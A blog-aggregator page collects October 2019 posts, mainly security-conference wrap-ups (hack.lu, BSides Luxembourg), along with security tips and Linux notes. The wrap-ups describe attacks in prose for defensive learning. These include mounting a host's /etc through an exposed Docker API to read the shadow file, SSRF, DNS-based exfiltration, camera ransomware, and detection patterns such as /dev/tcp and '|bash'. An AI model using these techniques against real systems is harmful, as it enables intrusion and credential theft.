Alors, certes, il me reste encore pas mal à faire pour configurer mon laptop aux petits oignons. Mais je crois que c’est le propre du libriste : ce ne sera jamais pleinement terminé. En fait, c’est un plaisir de mettre les mains dans le cambouis plutôt que de tester un énième logiciel propriétaire.

Attention, âmes sensibles s’abstenir de lire la suite, car la définition de plaisir chez un geek libriste est particulièrement retorse.

Dans mon planning, j’ai notamment mis d’arriver à faire une recherche de fichiers depuis Rofi, de travailler ma config Zsh, de faire une config mail Notmuch compatible avec Mutt et Astroid, de me trouver un calendrier en ligne de commande, de tester une vimification du browser (genre Tridactyl, mais faut que je puisse bépoïser tout ça), arriver à désactiver le screensaver quand le laptop est sur secteur (particulièrement ennuyeux quand je donne cours) et faire fonctionner autokey (ou toute autre solution équivalente). Arriver également à lister les TODOs dans mes différents fichiers, par exemple grâce à un plugin Vim.

Si vous n’êtes pas un geek linuxien un peu hardcore, le paragraphe précédent doit être du pur chinois pour vous. C’est normal, c’est signe que je suis revenu dans mon élément naturel !

Il y’a 15 ans, je lançais ce blog avec l’optique de convertir les windowsiens à Linux, j’abandonnais Debian et Fvwm pour Ubuntu et GNOME afin de me mettre dans la peau d’un utilisateur lambda. Peut-être qu’aujourd’hui, je peux redevenir moi-même. Et tant pis si personne d’autre n’arrive à utiliser mon laptop.

De toute façon, il est en Bépo…

Photo by Patrick Fore on Unsplash

Je suis @ploum, conférencier et écrivain électronique. Si vous avez apprécié ce texte, n'hésitez pas à me soutenir sur Tipeee, Patreon, Paypal, Liberapay ou en millibitcoins 34pp7LupBF7rkz797ovgBTbqcLevuze7LF. Vos soutiens réguliers, même symboliques, sont une réelle motivation et reconnaissance. Merci !

Ce texte est publié sous la licence CC-By BE.

October 31, 2019

This month was the “Cyber Security Month” and I had the idea to post a security tip on Twitter for the first day. Don’t ask me why. Then, I wrote a second one and decided to tweet something every day. We are now at the end of the day and I’m publishing a recap of all tweets…

  1. Cybersecurity should not be taken into account only during the Cyber Security Month…
  2. Wielding the Gartner #MagicQuadrant as a shield will not make you bullet-proof!
  3. To have a backup procedure in place is nice, but do you have a “restore” procedure?
  4. The efficiency of your #SIEM is not directly proportional to the number of indexed events!
  5. Restoring your last backup is not efficient when you faced a data leak
  6. Afraid of seeing well-trained people resign? What about those who don’t get training and stay on board?
  7. In meetings, do not always trust the person wearing a tie, the bearded man with a black t-shirt has for sure an interesting point of view!
  8. Choosing a #MSSP is not only subscribing to a bronze, silver or gold plan. Do they know your business and your crown jewels?
  9. A backdoor in your security device is not an OOB access solution.
  10. If you care about being port-scanned, you are focusing on wrong threats!
  11. Today, many software updates are still delivered over HTTP. Do NOT upgrade while connected to wild networks like #BruCON^Wsecurity conference!
  12. Thinking that you aren’t a juicy target for bad guys is wrong. You could be (ab)used to reach their final target!
  13. The goal of a pentest scope is not to prevent known-vulnerable servers or apps to be tested!
  14. If your organization faced the same incident multiple times, you probably have to optimize your incident management process.
  15. Many security incidents occur due to the lack of proper solutions for users to work efficiently.
  16. You don’t include #IPv6 in your security controls because you don’t use it? Wrong, you DO already!
  17. ML, AI, Agile, … Nice buzzwords but stick to basic security controls first!
  18. How can you protect yourself if you don’t know your infrastructure?
  19. Don’t hide behind your ISO certification!
  20. The best security solution is the one that fulfills all your requirements (features, $$, knowledge, integration). Don’t keep security $VENDORS promises as is, challenge them!
  21. No incident reported by your SOC for a while… Sounds good or bad? Improve your use cases constantly.
  22. Send your team members to infosec conferences, they will learn a lot and come back with plenty of ideas.
  23. Computers aren’t anymore a box with a screen, keyboard and mouse. Today most devices are connected computers with an OS, I/O, memory, storage and… vulnerabilities!
  24. Today, Infosec plays at layer 8. We have all tools and controls but most of the time we need to compose with political/business/legal aspects to deploy them.
  25. The Supply Chain does not stop once devices have been received. Decommissioning is also an important step to prevent information leak.
  26. Most of your security tools have plenty of unused/hidden features, learn them to improve their efficiency! #RTFM
  27. Docker containers’ purpose is not vulnerabilities containment.
  28. Assigning less budget to security in the hope to detect fewer incidents is a bad idea!
  29. Keep an eye on your Internet footprint. OSINT is used by attackers too.
  30. Don’t be afraid to look like the boring guy to your colleagues. One day, they’ll thank you!
  31. Take a deep breath and re-read all tips on this blog.

[The post Cyber Security Month Wrap-Up has been first published on /dev/random]

October 30, 2019

I published the following diary on isc.sans.edu: “Generating PCAP Files from YAML“:

BEC or “Business Email Compromize” is a trending thread for a while. The idea is simple: a corporate mailbox (usually from a C-level member) is compromized to send legitimate emails to other employees or partners. That’s the very first step of a fraud that could have huge impacts.

This morning, while drinking some coffee and reviewing my logs, I detected a peak of rejected authentications against my mail server. There was a peak of attempts but also, amongst the classic usernames, bots tested some interesting alternatives. If the username is “firstname”, I saw attempts to log in with… [Read more]

[The post [SANS ISC] Keep an Eye on Remote Access to Mailboxes has been first published on /dev/random]

October 29, 2019

A while ago, Debian's technical committee considered a request to figure out what a package should do if a service that is provided by that package does not restart properly on upgrade.

Traditional behavior in Debian has been to restart a service on upgrade, and to cause postinst (and, thus, the packaging system) to break if the daemon start fails. This has obvious disadvantages; when package installation is not initiated by a person running apt-get upgrade in a terminal, failure to restart a service may cause unexpected downtime, and that is not something you want to see.

At the same time, when restarting a service is done through the command line, having the packaging system fail is a pretty good indicator that there is a problem here, and therefore, it tells the system administrator early on that there is a problem, soon after the problem was created -- which is helpful for diagnosing that issue and possibly fixing it.

Eventually, the bug was closed with the TC declining to take a decision (for good reasons; see the bug report for details), but one takeaway for me was that the current interface on Debian for telling the system whether or not to restart a service upon package installation or upgrade, known as polic-rc.d, is flawed, and has several issues:

  1. The interface is too powerful; it requires an executable, which will probably be written in a turing-complete language, when all most people want is to change the standard configuration for pretty much every init script
  2. The interface is undetectable. That is, for someone who has never heard of it, it is actually very difficult to discover that it exists, since the default state ("allow everything") of the interface is defined by "there is no file on the filesystem that points to it".
  3. Although the design document states that policy-rc.d scripts MUST (in the RFC sense of that word) be installed through the alternatives system, in practice the truth is that most cases where a policy-rc.d script is used, this is not done. Since only one policy-rc.d can exist at any one time, the resulting situation is so that one policy script will be overwritten by the other one, or that the cleanup routine of the one policy script will in fact clean up the other one. This situation has caused at least one Debian derivative to end up such that they thought they were installing a policy-rc.d script when in fact they were not.
  4. In some cases, it might be useful to have partial policies installed through various packages that cooperate. Given point 3, this is currently not possible.

Because I believe the current situation leaves room for improvement, by way of experiment I wrote up a proof-of-concept script called policy-rc.d-declarative, whose intent it is to use the current framework to provide a declarative interface to replace policy-rc.d with. I uploaded it to experimental back in March (because the buster release was too close at the time for me to feel comfortable to upload it to unstable still), but I have just uploaded a new version to unstable.

This is currently still an experiment, and I might decide in the end that it's a bad idea; but I do think that most things are an improvement over a plan policy-rc.d interface, so let's see how this goes.

Comments are (most certainly) welcome.

I published the following diary on isc.sans.edu: “Generating PCAP Files from YAML“:

The PCAP file format is everywhere. Many applications generate PCAP files based on information collected on the network. Then, they can be used as evidence, as another data source for investigations and much more. There exist plenty of tools to work with PCAP files. Common operations are to anonymize captured traffic and replay it against another tool for testing purposes (demos, lab, PoC)… [Read more]

[The post [SANS ISC] Generating PCAP Files from YAML has been first published on /dev/random]

October 28, 2019

It's usually always a good thing to receive a newer laptop, as usually that means shiny new hardware, better performances and also better battery life. I was really pleased with previous Lenovo Thinkpad t460s and so the normal choice was its successor, also because default model following company standard, and so the t490s

When I received the laptop, I was a little bit surprized (had no real time to review/analyze in advance) by some choices :

  • No SD card reader anymore (useful when having to "dd" some image for armhfp tests)
  • Old docking style is gone and you have to connect through usb-c/thunderbolt
  • Embedded gigabit ethernet in the t490s (Intel Corporation Ethernet Connection (6) I219-LM (rev 30)) isn't used at all when docked, but going through usb-net device

Installing CentOS Stream (so running kernel 4.18.0-147.6.el8.x86_64 when writing this post) was a breeze, after I turned on SecureBoot (useful also because you can also use fwupd to get LVFS firmware updates automagically as I did for my t460s)

But quickly I realized a huge difference between my previous t460s and the new t490s : heat/temperature and so fan usage. To a point where it was really impossible to just even use our official video-conferencing solution : fan going crazy, laptop unresponsive (load average climbing to ~16), and video/sound completely "off-sync".

Dmesg was also full of such warnings :

[248849.131909] CPU1: Core temperature/speed normal
[248894.211874] CPU1: Package temperature above threshold, cpu clock throttled (total events = 1221232)
[248894.211897] CPU5: Package temperature above threshold, cpu clock throttled (total events = 1221232)
[248894.211902] CPU3: Package temperature above threshold, cpu clock throttled (total events = 1221233)
[248894.211903] CPU0: Package temperature above threshold, cpu clock throttled (total events = 1221233)
[248894.211903] CPU6: Package temperature above threshold, cpu clock throttled (total events = 1221233)
[248894.211904] CPU4: Package temperature above threshold, cpu clock throttled (total events = 1221233)
[248894.211905] CPU2: Package temperature above threshold, cpu clock throttled (total events = 1221233)
[248894.211905] CPU7: Package temperature above threshold, cpu clock throttled (total events = 1221233)
[248894.212895] CPU1: Package temperature/speed normal
[248894.212895] CPU5: Package temperature/speed normal
[248894.212908] CPU4: Package temperature/speed normal

After some quick research, I found some links about known issues on some (recent) Lenovo thinkpads and some possible solutions explaining the issue[s]:

Nice, or not so (still waiting for Lenovo to fix this through FW update for the t490s - when writing this blog post). I quickly tried to rebuild a community proposed fix and rpm is available in my Copr repository.

But, as stated on said github repo, it doesn't work with SecureBoot, so I temporary disabled it to test said fix, but it wasn't magical either, so I decided to re-eanble SecureBoot and be back in "normal" mode.

Then I found another interesting forum thread about t480 and fan/heat issue, so I decided to have a look.

Indeed : 'Thunderbolt BIOS Assist Mode' was disabled too in my case (wondering why it came with that disabled, while it was coming with RHEL8 installed, and pre-loaded) : let's enable it and see how that goes :

T490s settings

OMG ! instead of having a terminal open with "watch sensors" running, I wanted to have a quick look directly from gnome, so just installed the gnome-shell-extension-system-monitor-applet (available now in epel8-testing) and so far so good :

When running normal workload, while connected to Dock and two external displays), it runs like this :

temperature

And yesterday I was happy (ultimate test) to be in a video conf-call for more than one hour, with no video/sound issue and temperature just climbed a little bit, but nothing unusual when using such video call :

temperature

Hope it helps, also not if you run Linux on a t490s but any recent Lenovo Thinkpad (or even Yoga it seems) model. Now still waiting on Lenovo to release firmware for the throttling issue but at least the laptop is currently usable :)

October 26, 2019

I’m happy to announce a brand new blog dedicated to MediaWiki and all things enterprise wiki related.

Half a year ago I launched Professional Wiki together with Karsten Hoffmeyer. Professional Wiki is, as the name suggests, a company providing professional wiki services. We help companies create and manage wikis, we provide training and support and we offer fully managed wiki hosting.

Today we published our new blog featuring a first post on installing MediaWiki extensions with Composer. This blog will contain both wiki news and longer lived articles, such as the one about Composer.

In recent years I was hesitant to post MediaWiki specific content on this blog (EntropyWins) because it had evolved a focus on software design. The new Professional Wiki blog solves this problem, so you can expect more MediaWiki related posts from me again.

The post New MediaWiki blog appeared first on Entropy Wins.

October 25, 2019

After the MISP Summit on Monday, hack.lu, here is a quick review of the third event I’m attending in my crazy week in Luxembourg: BSides Luxembourg! It was already the 3rd edition (and the 2nd for me). The message is clear: this event focus on the “blue team” side, don’t expect offensive content like 0-days. I did not attend all the talks because there were two tracks and I spent some time to discuss with friends.

The first talk I attended was “Threat Hunting Linux & Mac using Elastic Auditbeat” by Aaron Jewitt. The talk covered the end-points problem when they run Linux or macOS. I twitted a few days ago that network monitoring is key to detect suspicious activity on a network but the main issue today for defenders is encryption. Most of the traffic is encrypted, DoH will be more and more popular. We need different solutions. A connection to Amazon over 443 has no context. Solution: end-point visibility. Windows has Sysmon and Event logs but what about UNIX flavored OS’s? Auditbeat to the rescue! Lightweight shipper to audit activities of users and processes. 3 modules: auditd (receive events from the Linux audit framework). The file integrity module generates events when files/folders are changed. Events content file metadata and hashes. The system module collects info about a system from 6 different datasets. It’s like a Sysmon for Linux & Mac. Datasets are available: Host, Login, Package, Process (the most useful for threat hunting), User. How to use Auditbear? The configuration is made via a YAML file. Configure the modules to be used, each module has specific config, set logging output. threat hunting is a never-ending process. You assume that you’ve been breached but you don’t know how/where/when. What about macOS? Apple is shy and doesn’t let you see what’s happening. objective-see.com/. Example of hunting on Mac: Persistence: Kernel extensions (KExts) Watch for ‘kextload’ process execution. Look ar /var/at/tabs/. “defaults” is a command to change the default: defaults read also : /private/etc is like /etc on Linux. bashrc, man.conf. Monitor Sudo activity. Monitor for strange parent/child processed (like Windows). And Linux? processes with /dev/tcp/*, php with fscockopen, The good old “|bash” 🙂 Conclusions: endpoint visibility can empower defenders. Keep an eye on Linux/macOS. This is really adding value to the network monitoring.

Just after this presentation, I switched to the other track to follow “Security Trade-offs in ElasticSearch” by Philipp Krenn. He explained some security facts about ElasticSearch.

How to Shield an IoT product from the OWASP IoT Top-10” by Pablo Endres. After a brief recap about IoT, he switched to the dark side: the security of IoT devices. Huge topic! IoT is, by design, pretty complex: you have a mix of hardware, software, firmware, communication protocols, gateways (sometimes), network, data collection, and applications. Everybody remembers the joke: The “S” in IoT stands for “Security”. After reviewing different aspects of the (in)security of IoT devices, Pablo reviewed the OWASP IoT project and the top-10 vulnerabilities.

The next talk was really interesting because I’m also working on the same kind of project: “Automated Attack Surface Detection and Information Gathering” by Thorsten Ries. He described his project: automatically scan and enrich IP addresses used by his organization. Indeed, when you’ve many public IP addresses, it’s important to keep an eye on services they expose (by mistake or because a new vulnerability has been released for a specific application – example the famous RDP vulnerability). The idea is the following:

Scan > Enrich >Report > Mitigate

Thorsten explained how he performs these tasks, which components are interconnected (Shodan, Spiderfoot, etc). Interesting.

After the lunch break, it was my turn and I presented “A Walk Through Logs Hell“. This was a brand new talk that covered a series of mistakes that you could face with your log management solution. I had some pertinent questions during the Q&A.

Then, James Nemetz reviewed the Equifax breach with “(Identify)|Protect|Detect|Respond – A Deep Dive into a High Visibility 2017 Breach“. I like this kind of review because you learn many mistakes and realize that the same could apply in your own environments. To resume, it was a complete fail.

After the afternoon coffee break, Daan Raman presented the framework developed by NVISO, a Belgian security consultancy company. The framework is performing. statistical outlier detection. The idea is too not to detect activity using common signatures (this can be performed by many other tools) but to detect a known-bad event that are difficult to detect via the same rules. This is based on the generation of statistics model (that must be automated). ee-outliers, an open-source framework developed to detect statistical outliers in events stored in an Elasticsearch. The framework is available here.

Last but not least, Peter Czanik presented “What you most likely did not know about Sudo…”. The last time, I met Peter, I was also a speaker at the same time. Finally, I was able to attend his talk about the magic command and I was not disappointed! I’m using Sudo for 15+ years and I still learned new stuff. What is Sudo? This picture resumes everything:

For many people, Sudo configuration remains simple and looks like this:

%wheel ALL=(ALL) ALL

You can read this as who, where, as which user, which command can be executed but there are many other features that can be activated. First example: digest verification. If the binary allowed to a user is modified, Sudo will prevent the execution. Second example: session recording. You can record a Sudo session than play it back later. Small security issues: sessions are recorded locally and can be easily destroyed. In fact, the latest release of Sudo has a modular plugin architecture and features can be added (as shared libraries or directly in the code). An interesting plugin is an approval system that allows another admin to review the command that will be executed via Sudo and to allow/reject it. You can see this as a “dual-control system”. The plugin is called sudo_pair. Then Peter explained how to integrate Sudo with Syslog-NG for better logging and reporting. Finally, I explained what’s in the pipe for future release. Great job!

That’s over! My week in Luxembourg is completed, driving back to Belgium. See you soon for other wrap-up’s!

[The post BSides Luxembourg 2019 Wrap-Up has been first published on /dev/random]

October 24, 2019

And here is my third and last wrap-up for the 2019 edition of hack.lu!

The last day is always harder for many people after the social event but I was on time to follow the first talk: “Beyond Windows Forensics with Built-in Microsoft Tooling” by Thomas Fischer. Thomas’s goal was to give some “ideas” to people who attended the talk to implement new things when back at work.

Thomas on Stage

Shadow IT is a problem because when you’ve to investigate an incident on a device that you don’t own, you don’t have all the tools like on a corporate computer. How to quickly investigate without messing up everything? Most of the time, they are running Windows. Good news, Powershell is available everywhere since Windows 7. It supports regexes, uses objects for data. You can instruct Powershell to fetch a script via HTTP and execute it in memory (thanks to “IEX”). You can access files, registry, event logs. There is also a lot of scripts available online. We have the foundations. Then Thomas presented “SRUM” or “System Resource Usage Monitor”. It’s a Windows component available since Windows 8 that collects processes and network-related metrics over time (since the machine boot!). Application History (from the task manager) is also a good source of data. All started processes (even if removed from the system) are logged. The rest of the talk was a suite of demos based on Powershell scripts used to pull data from the SRUM database. I think that SRUM + scripts deserve to be presented in a workshop format to give people a chance to try it. Thomas’s scripts are available here.

Then, we switched to the APT world with “Effectiveness in simplicity: The Taskmasters APT” presented by Elmar Nabigaev. The APT group discovered is called “TaskMasters” and uses very simple TTP’s! Discovered in 2010, they focus on espionage and have a big toolbox. What about their victims? Military contractors, governments, telecom but also small businesses. Their kill chain is: Initial vector unknown (probably phishing emails) > Escalation (EternalBlue, Stolen creds) > Lateral movement (scanning, tunneling, scheduled tasks, RDP) > Exfiltration. Elmar reviewed the malware behind the attack: Remshell. What about the toolbox that used? It is based on public tools (Microsoft SysInternals, scanners, webshells, WinRAR) as well as private tools (fcopy, 404-Webshell, EthernalBlueExploiter). Some tools were reviewed but also some mistakes the attackers made More details about this research is available here.

After the morning coffee break, we switched to the wonderful world of containers with “Who contains the containers” presented by Ioana Andrada and Emilien Le Jamtel. Seeing the big success around container technologies, this is a hot topic. First, how easy it is to compromize containers? The presentation focused on Dockers. Many containers are deployed in the wild, often without real security concerns. About images: what’s the source? Can we trust it? Is it securely build? Does it leak interesting secrets? Is it up to date? What privileges are required? (Here is an interesting link about container hardening). Many Docker daemons expose their API port in the wild (TCP/2375-2376). Use TLS and enable debugging log level for API calls. Kubernetes (the orchestration tool) must also be properly secured. Kubernetes uses “objects”: pod, service, volume, namespace. It also has many API’s you should not expose:

APIs You Should not Expose

During the next part, by Emilien, was about attacks against containers. CVE-2019-5736 is the most-known (it affects “runc”) but also CVE-2018-8115 (Docker for Windows). Why would you expose Docker API’s on the Internet!?

Abusing API

Emilien explained how easy it is to find publicly accessible Docker instances and how you can start a container from the API with a mounted folder from the host. Docker runs as root by default. Just start a Ubuntu image, mount /etc as /tmp and “cat /tmp/shadow”, booooom! Finally, some interesting cases based on scanning for exposed infra. xmrig miners are the most common usage made of compromize containers. If you play with Docker containers, here is an interesting tool mentioned: dive. It was my preferred talk for today!

I skipped the next talk: “spispy: opensource SPI flash emulation” by Trammel Hudson.

After the lunch break, the afternoon started with “Piercing the Veil: Server Side Request Forgery attacks on Internal Networks” by Alissa Herrera. It was about a successful attack using SSF (“Server Side Request Forgery”). To resume; it’s an attack to maliciously make a server perform a request/lookup. This can lead to Intranet attacks. It’s not a new attack, it has been described for the first time in Phrack! Alissa reviewed different ways to exploit this vulnerability and also some of her findings while having a look at .mil servers.

Next one, “Defeating Bluetooth Low Energy 5 PRNG for fun and jamming” by Damien Cauquil. Damien gave this talk at BruCON a few weeks ago but I was able to follow him.

Damien on Stage

Damien explained in detail what’s new in version 5.0 of BTLE? Security mechanisms are pairing, secure connections, and channel selection algorithm. The known attacks (for BTLE <4.2) are: Sniffing, jamming or hijacking. What introduced BTLE 5? Better throughput, better range, and improved coexistence. The new channel selection algorithm is PRNG-based and more “random” than the previous one. In the next part of his presentation, Damien explained that the PRNG is “not really a PRNG”. It was designed to improve coexistence, not security. With BTLE 5, Damien updated his testing framework btlejack.

We needed a good refill of caffeine before the last set of talks. First, “DOS Software Security: Is there Anyone Left to Patch a 25-year old Vulnerability?” by Alexandre Bartel. When I read “DOS” in the abstract, I though “denial of service” but Alexandre spoke about the “Disk Operating System”, yes you read it properly the good old operating system. DOS does not mean “Dead Operating System”. It started in 1966 with DOS/360, then Atari DOS and many other different flavors like MS-DOS, FreeDOS (in 1998). But it is still alive! Example: McLaren used it on laptops to interconnect with the F1 cars (a bespoke CA card). Today, you can still use it via DOSBox, a DOS emulator. Alexandre started to fuzz DOS to find vulnerabilities and found an interesting buffer overflow. It’s crazy to see how game development companies still rely on DOSBox and games use the same engine (Ex: Shadow Warrior). The next idea was: what if we could access the local filesystem of the host running DOSBox. Better, what if we could access the memory and exploit the host? Challenge completed, Alexandre demonstrated a DOSBox that spawns a calculator on the underlying Linux host!

Popping a calculator via DOSBox

Last but not least, “DNS On Fire” was presented by Paul Rascagneres & Warren Mercer. After a brief recap of how DNS is working, they explained what a DNS redirect attack is (with many examples). This research started while analyzing a malware sample. Communication with the C2 was performed through HTTP requests or… DNS!

Paul & Warren on Stage

DNSpionage uses interesting techniques to communicate over DNS. A DNS request to the C2 returns a fake IP address that, decoded, gives the command to be executed (ok, the number of commands is limited). Then, the command results are exfiltration via more DNS requests (by groups of four chars!). In the next part, they presented Sea Turtle. DNS hijacking is really a pain and is used for a long time. Key take away: monitor your DNS records for any suspicious change and also the Certificate Transparency project for any SSL certificate generated for your domain(s).

That was my last wrap-up, the 2019 edition is already over. Tomorrow, let’s follow BSides Luxembourg (I’ll also speak there).

[The post Hack.lu 2019 Day #3 Wrap-Up has been first published on /dev/random]

October 23, 2019

After a short night playing the CTF and a lot of morning coffee, I was ready for the second day…

It started with a hot-topic: “Sensor & Logic Attack Surface of Driverless Vehicles” presented by Zoz. Even if not yet common on our roads today, self-driving cars (or cars with many driving helps) exist. The first self-driving car was developed in 1986 in Germany! (a car with embedded cameras). In Europe, they are many projects ongoing from the UK with Nissan, Volvo in Sweden or BMW in Germany. There is also an EU project called AUTOPILOT. The real revolution is coming in many fields: transportation, mapping services, a lot of civil applications. The idea is to prevent humans to make mistakes but… many failures may occur. What’s the logic behind these cars? We have the following architecture: Controls > collision avoidance > navigation & localization > planners/reasoners.

Vehicles are equipped with many sensors: GPS, LIDAR, Cameras, wave radars, IMU, compass, doppler, pressure, … Sensors are a source of uncertainty like noise, drift, latency. What kind of attacks can be performed against those sensors: DoS, spoofing. Instantaneously or based on aggregated data. In the rest of his presentation, Zoz reviewed, for each sensor, what are their weaknesses and how to abuse them.

Saad Kadhi presented “Disturbance: on the Sorry State of Cybersecurity and Potential Cures“. In the beginning, there was a first security tool: an anti-virus. It was born in 1970! It protected us (to some extent) but today, AV’s are not strong enough to protect us against the new threats like worms, trojans, ransomware and today fileless malware. But also unwanted applications like Mimikatz (PUA).

Saad on Stage

Saad referenced a paper about the “Microsoft Monoculture”. Monoculture can be seen as bad but it has advantages. The security of Microsoft products really improved in time. However, monoculture implies standards and class breaks. If targets are widely deployed, we increase the surface attack. Many security tools were impacted by vulnerabilities and the same applies for supply chain attacks. What if the same HVAC system was used by many organizations (remember the Target story). TeamViewer is a good example reported by Christopher Glyer (APT41). The security product zoo keeps growing but those products also introduce issues. And all those products run on top of vulnerable processors. All the products need people to be installed, used and maintained. But the human brain is not a computer (too much stuff to learn, distraction, burnouts) How to break the failure cycle? The idea of the talk was very nice but, I’m playing the Devil’s advocate here, in many (big) organizations, there is no alternative to buying expensive solutions from security vendors…

After a short but welcome coffee break, Mathieu Tarral presented “Leveraging KVM as a debugging platform“. Last year, Matthieu already presented his research about using hypervisors to perform malicious code analysis (r2vmi). This year, he came back with new stuff: VM introspection on KVM. An interesting approach again that deserves to be checked if you are playing with sandboxes and malware analysis.

The next talk was “The Red Square – Mapping the connections inside Russia’s APTI ecosystem” presented by Ari Eitan and Itay Cohen. I like the approach of the talk: search for connections between Russian malware samples. The research started by reading a lot of material. Then the following steps were implemented: gathering the samples, classification, find code similarities and analyze the found connections. The challenge of the classification was, as usual, the lack of naming convention. To help them in this process, they developed a tool called APT Detector (based on YARA rules).

The next talk was flagged as TLP:Amber, no review. “Fileless Malware Infection and Linux Process Injection in Linux OS” by Hendrik Adrian. Great content and thank you for the awesome content that you post regularly!

After the lunch, Andreia Gaita presented “Exploiting bug report systems in the game industry”. The target was not companies editing games but companies making middleware tools used by the gaming industry. Indeed like CMS or frameworks, why reinvent the wheel? Many games are based on the same engine. They are many but some are really popular like Unity. They are used by popular game editors, used by millions of people that make them very nice targets. A game engine can be seen as a layered approach, we have: Platform > Game Engine runtime > Script layer >Game.

Andreia on Stage

Making a game is like the cinema industry. Programming is not the most important but scenarios, productions are. A key concept is “hot reloadable code”. The code is recompiled on the fly while the game is running (Andreeia made some demos). She explained how easy it is to attack, sometimes just be submitting a bug report. Once submitted, it is reviewed and escalated to the engine developers and guess what? The development environment is not very safe (ex: many recommendations are made to disable the AV!)

Then, the next presentation was “What the log?! So many events, so little time…” by Miriam Wiesner from the Microsoft Defender ATP. In a typical attack, we have huge times between the attack and the detection. More than 200 days to be detected (depending on the industry). While 24-48h to pivot internally. And many simply don’t know that they’ve been breached. But we are safe! We have a firewall and an antivirus!”. Users remain the weakest link. Microsoft Security Compliance Toolkit 1.0 (). Event logs have so many events… Huge document at Microsoft >700 pages. Event List 1.0 is an Excel sheet to import baselines and choose a baseline to generate an event list for this baseline

Event List Powershell Interface

Event List is also compatible with the Mitre ATT&CK framework. You can generate GPO’s or rules for Splunk. Guess what? Event List is working with Sigma too! This one one of my preferred talk today!

Marion Marshalek presented “The Glitch In The Matrix“. Marion works at Intel STORM and was presenting for the 5th time at hack.lu. As usual, her slides were very deep and technical but well designed. To resume, we always say that if an attacker has physical access to your computer, you might consider it as lost. Marion explained that the same is true for compilers. If an attacker has access to your compiler (GCC in this case), you can’t trust the generated code

GCC Architecture

After the afternoon coffee break, “Hacktivism as a defense technique in a cyberwar. #FRD Lessons for Ukraine” was presented by Kostiantyn Korsun, from Ukraine. This country is known to have been/be under constant waves of cyber-attacks: The election in 2014, BlackEnergy in 2015, NotPetya in 2017, etc.. Attacks are successful because vulnerabilities are present everywhere. That’s why the concept of “FRD” was introduced or “F*ck Responsible Disclosure”. It’s a mix of responsible and full-disclosure. Public information are disclosed but without working exploit. The motivation behind this is the overall improvement of the country’s security. But is it legal?

Kostiantyn on Stage

They are many positive points thanks to FRD: more visibility, increase in budget. And it’s supported by Ukrainian Law Enforcement services. So, it’s fun, legal, brings positive things and is always ongoing. But it’s important to keep in mind the difference between “open” access to data and “hacking”. This topic was indeed covered during the Q&A session! For some attendees, the limit was not very clear.

And we continued with “DeTT&CT: Mapping your Blue Team to MITRE ATT&CK” by Ruben Bouman () & Marcus Bakker. They explained the issues they faced and how they improved their hunting capabilities. Where to start hunting? They follow this path: Data Source > Visibility > Detection > TTP’s. The next part of the presentation covered the framework they developed (DeTTECT) to administrate, score and compare data sources quality, visibility detection and behaviors.

The last slot for today was assigned to Takahiro Haruyama who presented “Defeating APT10 Compiler-level Obfuscations“. Compilers have multiple optimization and obfuscation techniques that are a pain for malware analyst. One of the technique is called “Opaque predicates” and was covered by Takahiro. It was way too deep for me!

The day finished with some fun: the classic lightning talks (5 mins / speaker) and a brand new idea: “Call for Failure”. The goal is to give 10 mins to a speaker to let him tell a failure or nightmare story he faced (we all have stories like this). It was a big success with 5 submissions and a lot of laughs!

Slides will be published soon and I’d like to mention Cooper who’s doing an amazing job to record talks, post-process and publish them on Youtube in almost real-time!

[The post Hack.lu 2019 Day #2 Wrap-Up has been first published on /dev/random]

October 22, 2019

Hello Readers! The first day of the hack.lu conference is already over, here is my wrap-up! The event started around 10:30, plenty of time to meet friends around a first coffee!

The conference was kicked off by Axelle Apvrille who is a security researcher focusing on mobile devices and apps. The title was “Smartphone apps: let’s talk about privacy“.

Axelle on Stage

Privacy and smart phone… a strange feeling right? The idea of Axelle was to make an overview of what leaks we have on our beloved devices and how much? How to spot privacy issues? The research was based on classic popular applications . They were analyzed from a privacy and security point of view with the tool Droidlysis. It disassembles the app and searches for patterns like attempts to run an exe, if obfuscated or attempts to retrieve the phone number etc. Many apps retrieve IMEI numbers or GPS location (ex: a cooking app!?). Guess what, many of them fetches data that are not relevant for normal operations. The package size can also be an indicator. More than 500 lines of Android manifest for some apps! Axelle asked to not disclose which ones. Axel also checked what is leaked from a network point of view: MitMproxy or better Frida to hook calls to HTTP(S) requests. Firebase leaks in a medical app for diabetic users. A good tip for developers: Do not integrate dozen of 3rd party SDK’s, provide ways to disable tracking, logging, analytics.

Then, Desiree Sacher presented “Fingerpointing false positives: how to better integrate continuous improvement into security monitoring“. Desiree is working as a SOC architect and hates “false positives”.

Desiree on Stage

A SOC needs to rely on accurate company data to work efficiently. Her goal: build intelligent processes and efficient workflows and detection capabilities. How to prevent false positives: from a technical point of view (ex: change the log management configuration, collection) or admin/user action: update process. She reviewed different situations that you could face within your SOC and how to address them. By example, for key business process artefacts, if you get bad IOC or wrong rule pattens, do not hesitate to challenge your provider. Also, test alert! They should be excluded from reporting. Desiree published an interesting paper to optimize your SOC.

Harlo presented “Tiplines today“. She works for freedom of the press foundation. It’s a non-profit organization which does amongst other stuff software development (securedrop.org) but also advocacy: US Press Freedom Tracker and education: Digital security training. The talk covered multiple techniques and tools to safely communicate.

Messaging Apps Privacy Behaviour

After the lunch break, the stage was to Chris Kubecka who presented “The road to hell is paved with bad passwords“. It was the story about an incident that she handled. It started (as in many cases) with an email compromise following by some email MITM, installation of a rootkit and some extortion. To initial compromization (the mailbox) was due to a very light password (“123456”)! 1st incident: email account breach (password = 123456). Chris reviewed all the aspects of the incident. At the end, no extorsion was paid, suspect reassigned and neutralized. Lessons learned: geopolitics, real human consequences, never trust gifts, prepare and… don’t panic!

Eyal Itkin, from Checkpoint, came on stage with a talk called “Say cheese – how I ransomwared your DSLR camera?“. Like every year, Checkpoint is coming back to hack.lu with a new idea: what could be broken? 🙂 Conferences are good for this, also friends who use the targets on a daily basis. Why cameras? Photography is a common hobby with many potenial victims. People buy expensive cams and protect them (handled with care). They also contains memories from special events! birthdays, grand-ma’s picture, … with a huge emotional impacts on victims. Once you compromized the device, what to do? Brick it or setup an espionage tool? Why not ransomware? Some people reverse the firmware and added features (see magiclantern.fm). An open source project is great in this case, the documentation is key! The attack vector was PTP (Picture Transfer Protocol). Not only USB but also TCP/IP. There was already a talk about PTP that was presented at HITB in 2013 but more from a spying device aspect. The protocol has no authentication not encryption. Just ask the camera to take a picture and transfer it. First step, analyze the firmware. Grab it from the vendor website but it was AES encrypted and Google did not know the key. Can we dump the firmware from the camera? ROM Dumper! MagicLantern had the key, let’s dump and load into IDA. The OS is DryOS, proprietary to Canon, real-time OS. Let’s break PTP. Each command has a code (open, close, create, etc). Found 3 RCE and 2 were related to bluetooth. CVE-2019-5998 was the most interesting. 